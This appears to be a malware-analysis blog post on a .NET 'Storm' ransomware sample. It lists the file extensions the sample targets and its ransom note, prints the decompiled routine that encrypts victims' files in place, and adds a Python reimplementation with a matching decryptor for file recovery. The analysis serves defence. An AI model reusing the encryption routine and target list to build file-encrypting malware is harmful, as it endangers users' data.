Sunday, July 30, 2017

Storm Ransomware:

Today we are analysing a malware sample with SHA-256 hash 791b700810e356339066b67f2f4febc9089b5541d602946a243dfb15e6f3918e. It is referred to as the Storm ransomware sample.

Storm Ransomware
The sample is compiled for .NET; the snapshot below shows the .NET compiler detected for the file. Managed code like this can be decompiled with little effort, so let's do that.
.net compiled
Interesting strings present in the binary:

0000000052EF   0000004070EF      0   Property can only be set to Nothing
000000005337   000000407137      0   WinForms_RecursiveFormCreate
000000005371   000000407171      0   WinForms_SeeInnerException
0000000053CF   0000004071CF      0   .accdb
0000000053E7   0000004071E7      0   .aepx
00000000547B   00000040727B      0   .class
0000000054FD   0000004072FD      0   .docb
000000005509   000000407309      0   .docm
000000005515   000000407315      0   .docx
00000000552B   00000040732B      0   .dotm
000000005537   000000407337      0   .dotx
000000005593   000000407393      0   .idml
0000000055A9   0000004073A9      0   .indb
0000000055B5   0000004073B5      0   .indd
0000000055C1   0000004073C1      0   .indl
0000000055CD   0000004073CD      0   .indt
0000000055ED   0000004073ED      0   .java
0000000055F9   0000004073F9      0   .jpeg
000000005623   000000407423      0   .m3u8
000000005693   000000407493      0   .mpeg
00000000578F   00000040758F      0   .potm
00000000579B   00000040759B      0   .potx
0000000057A7   0000004075A7      0   .ppam
0000000057C7   0000004075C7      0   .ppsm
0000000057D3   0000004075D3      0   .ppsx
0000000057E9   0000004075E9      0   .pptm
0000000057F5   0000004075F5      0   .pptx
000000005801   000000407601      0   .prel
00000000580D   00000040760D      0   .prproj
0000000058A3   0000004076A3      0   .sldm
0000000058AF   0000004076AF      0   .sldx
000000005965   000000407765      0   .xlam
000000005999   000000407799      0   .xlsb
0000000059A5   0000004077A5      0   .xlsm
0000000059B1   0000004077B1      0   .xlsx
0000000059C7   0000004077C7      0   .xltm
0000000059D3   0000004077D3      0   .xltx
000000005A0F   00000040780F      0   Label1
000000005A1E   00000040781E      0   _______________________________________________________________________________________
000000005ACE   0000004078CE      0   Button1
000000005AE4   0000004078E4      0   Microsoft Sans Serif
000000005B0E   00000040790E      0   Label2
000000005B1C   00000040791C      0   Storm Ransomware
000000005B3E   00000040793E      0   RichTextBox1
000000005B5A   00000040795A      0   Label3
000000005B68   000000407968      0   Send mony to my bitcoin :
000000005B9C   00000040799C      0   Label5
000000005BB2   0000004079B2      0   Label6
000000005BC0   0000004079C0      0   Contact Me : 
000000005BDC   0000004079DC      0   Button2
000000005BF6   0000004079F6      0   TextBox1
000000005C08   000000407A08      0   Form1
000000005C22   000000407A22      0   taskmgr.exe
000000005C3A   000000407A3A      0   ProcessHacker.exe
000000005C5E   000000407A5E      0   FullName
000000005C82   000000407A82      0   Hassan
000000005C90   000000407A90      0   HassanAmiri
000000005CA8   000000407AA8      0   Winrar
000000005CB7   000000407AB7      0   Hello You Are Hacked Now !! All your personal files have been encrypted ! if you want restore your data you have to pay ! Remember you can't restore your data without our decryptor !!!!
000000005E2B   000000407C2B      0   ertyuioppoiuhygtfrdeRFTGYHDEZEFFZEF
000000005E73   000000407C73      0   StormRansomware(at)gmail(dot)com

This list of strings gives the file extensions targeted by the Storm ransomware (Office, Adobe and source-code file types among them), the labels of the ransom-note form (a button and labels such as "Send mony to my bitcoin :" and "Contact Me :"), the ransom message itself, and the contact address StormRansomware(at)gmail(dot)com. The process names taskmgr.exe and ProcessHacker.exe are also present.
The email id and password details may well be present in the code as well. We decompiled the code; the following snapshots show the relevant parts:

Email id and password details
Process detail
The following code snippet is the cryptography-related routine:
using System.IO;
using System.Security.Cryptography;
using System.Text;

// Decompiled from the sample (variable names as the decompiler emitted them). The file
// is read, encrypted and written back in place. The post's snapshot ends at the inner
// try block; the closing blocks after it are restored here so the method compiles.
public static void EC(string nombre, string password)
{
    // Key = the password's ANSI bytes (Encoding.Default) copied into a zero-filled
    // 32-byte array. CopyTo throws if the password is longer than 32 bytes.
    byte[] array = new byte[32];
    Encoding.Default.GetBytes(password).CopyTo(array, 0);
    // Rijndael with a 256-bit block, i.e. not AES (whose block is fixed at 128 bits).
    // .NET Core's RijndaelManaged only supports 128-bit blocks; this needs .NET Framework.
    RijndaelManaged rijndaelManaged = new RijndaelManaged
    {
        Mode = CipherMode.CBC,
        KeySize = 256,
        BlockSize = 256,
        Padding = PaddingMode.Zeros // padding zeros are indistinguishable from real trailing zeros
    };
    byte[] array2 = File.ReadAllBytes(nombre);
    MemoryStream memoryStream = new MemoryStream();
    try
    {
        // CreateEncryptor(key, iv): the same array is passed twice, so IV == key.
        CryptoStream cryptoStream = new CryptoStream(memoryStream, rijndaelManaged.CreateEncryptor(array, array), CryptoStreamMode.Write);
        try
        {
            cryptoStream.Write(array2, 0, array2.Length);
            // As posted, no FlushFinalBlock() precedes ToArray(). A CryptoStream keeps a
            // trailing partial block buffered until then, so if the snapshot is complete,
            // the last block of a file whose size is not a multiple of 32 bytes is dropped.
            byte[] array3 = memoryStream.ToArray();
            byte[] array4 = new byte[checked(array3.Length - 1 + 1)]; // same length as array3 (decompiled VB.NET array bound)
            array3.CopyTo(array4, 0);
            File.WriteAllBytes(nombre, array4);
        }
        finally
        {
            cryptoStream.Dispose();
        }
    }
    finally
    {
        memoryStream.Dispose();
    }
}
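
To make the scheme above concrete, and to give a starting point for recovering files once the password is known, here is an added example in Python. It is not code from the sample or from this post: it reimplements what EC() does (password bytes zero-extended to a 32-byte key, Rijndael with a 256-bit block, CBC with the key reused as the IV, zero padding) and adds the matching decryptor. Rijndael with a 256-bit block is not AES, so common AES libraries cannot decrypt these files; the cipher is therefore implemented directly, for any block width, and can be checked against the FIPS-197 AES vectors through the same code path with a 128-bit block. Assumptions made here: Encoding.Default is treated as cp1252, storm_encrypt emits the final zero-padded block (what the .NET routine produces once the CryptoStream is flushed), and the names storm_key, storm_encrypt and storm_decrypt are chosen for this example.

```python
from functools import reduce
from operator import xor
# Added example, not the sample's code: Rijndael for any block width (RijndaelManaged
# with BlockSize = 256 is not AES, so AES libraries cannot decrypt these files).

def _xtime(a):  # multiply by x in GF(2^8), polynomial x^8 + x^4 + x^3 + x + 1
    a <<= 1
    return (a ^ 0x11B) & 0xFF if a & 0x100 else a

def _gmul(a, b):  # multiply two GF(2^8) elements
    r = 0
    while b:
        r, a, b = r ^ (a if b & 1 else 0), _xtime(a), b >> 1
    return r

def _build_sbox():  # multiplicative inverse, then the affine map (S[0] = 0x63)
    sbox = []
    for x in range(256):
        inv = next((y for y in range(1, 256) if _gmul(x, y) == 1), 0)
        rots = [((inv << k) | (inv >> (8 - k))) & 0xFF for k in range(5)]
        sbox.append(reduce(xor, rots) ^ 0x63)
    return sbox

SBOX = _build_sbox()
INV_SBOX = [SBOX.index(i) for i in range(256)]
_SHIFTS = {4: (0, 1, 2, 3), 8: (0, 1, 3, 4)}  # ShiftRows offsets for Nb = 4 and Nb = 8

def _expand_key(key, nb):  # Rijndael key schedule -> (round-key words, round count)
    nk = len(key) // 4
    nr = max(nk, nb) + 6
    w = [list(key[4 * i:4 * i + 4]) for i in range(nk)]
    rcon = 1
    for i in range(nk, nb * (nr + 1)):
        t = list(w[i - 1])
        if i % nk == 0:
            t = [SBOX[b] for b in t[1:] + t[:1]]  # RotWord, SubWord, then Rcon
            t[0] ^= rcon
            rcon = _xtime(rcon)
        elif nk > 6 and i % nk == 4:
            t = [SBOX[b] for b in t]
        w.append([w[i - nk][j] ^ t[j] for j in range(4)])
    return w, nr

def _mix(col, m):  # one state column times the circulant matrix with first row m
    return [reduce(xor, (_gmul(m[(j - i) % 4], col[j]) for j in range(4))) for i in range(4)]

def _block(data, w, nr, nb, decrypt):  # encrypt or decrypt one block of 4*nb bytes
    st = [list(data[4 * c:4 * c + 4]) for c in range(nb)]  # column-major state
    off, d = _SHIFTS[nb], -1 if decrypt else 1
    box, m = (INV_SBOX, (14, 11, 13, 9)) if decrypt else (SBOX, (2, 3, 1, 1))

    def add_key(r):
        st[:] = [[st[c][i] ^ w[r * nb + c][i] for i in range(4)] for c in range(nb)]

    def sub_shift():  # SubBytes + ShiftRows, or their inverses when decrypting
        st[:] = [[box[st[(c + d * off[i]) % nb][i]] for i in range(4)] for c in range(nb)]

    add_key(nr if decrypt else 0)
    for r in (range(nr - 1, 0, -1) if decrypt else range(1, nr)):
        sub_shift()
        if decrypt:  # the inverse cipher adds the round key before InvMixColumns
            add_key(r)
        st[:] = [_mix(col, m) for col in st]
        if not decrypt:
            add_key(r)
    sub_shift()
    add_key(0 if decrypt else nr)
    return bytes(b for col in st for b in col)

BLOCK = 32  # bytes; RijndaelManaged BlockSize = 256

def storm_key(password):  # password bytes copied into a zeroed 32-byte array, as in EC()
    pw = password.encode("cp1252")  # Encoding.Default is the victim's ANSI code page; cp1252 assumed
    if len(pw) > BLOCK:  # CopyTo into a 32-byte array throws in .NET
        raise ValueError("password longer than 32 bytes; the sample would throw")
    return pw + bytes(BLOCK - len(pw))

def storm_encrypt(data, password):  # CBC, IV == key (CreateEncryptor(array, array)), zero padding
    key = storm_key(password)
    w, nr = _expand_key(key, BLOCK // 4)
    if len(data) % BLOCK:  # PaddingMode.Zeros pads only when the length is not aligned
        data = bytes(data) + bytes(BLOCK - len(data) % BLOCK)
    prev, out = key, bytearray()
    for i in range(0, len(data), BLOCK):
        prev = _block(bytes(x ^ y for x, y in zip(data[i:i + BLOCK], prev)), w, nr, BLOCK // 4, False)
        out += prev
    return bytes(out)

def storm_decrypt(data, password):  # reverse of EC(); zero padding is left for the caller to judge
    key = storm_key(password)
    w, nr = _expand_key(key, BLOCK // 4)
    if len(data) % BLOCK:
        raise ValueError("ciphertext length is not a multiple of 32 bytes")
    prev, out = key, bytearray()
    for i in range(0, len(data), BLOCK):
        blk = bytes(data[i:i + BLOCK])
        out += bytes(x ^ y for x, y in zip(_block(blk, w, nr, BLOCK // 4, True), prev))
        prev = blk
    return bytes(out)
```

Two consequences of the routine are visible when running this: because the IV is the key, every file encrypted with the same password that shares its first 32 bytes (a common file header, for instance) yields the same first 32 bytes of ciphertext, and because the padding is zeros, storm_decrypt cannot tell padding from a file that genuinely ends in NUL bytes, so trailing zeros should only be stripped where the file format makes that safe.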

Conclusion:
Currently the top AV vendors detect this variant; the most common detection name is MSIL crypter.
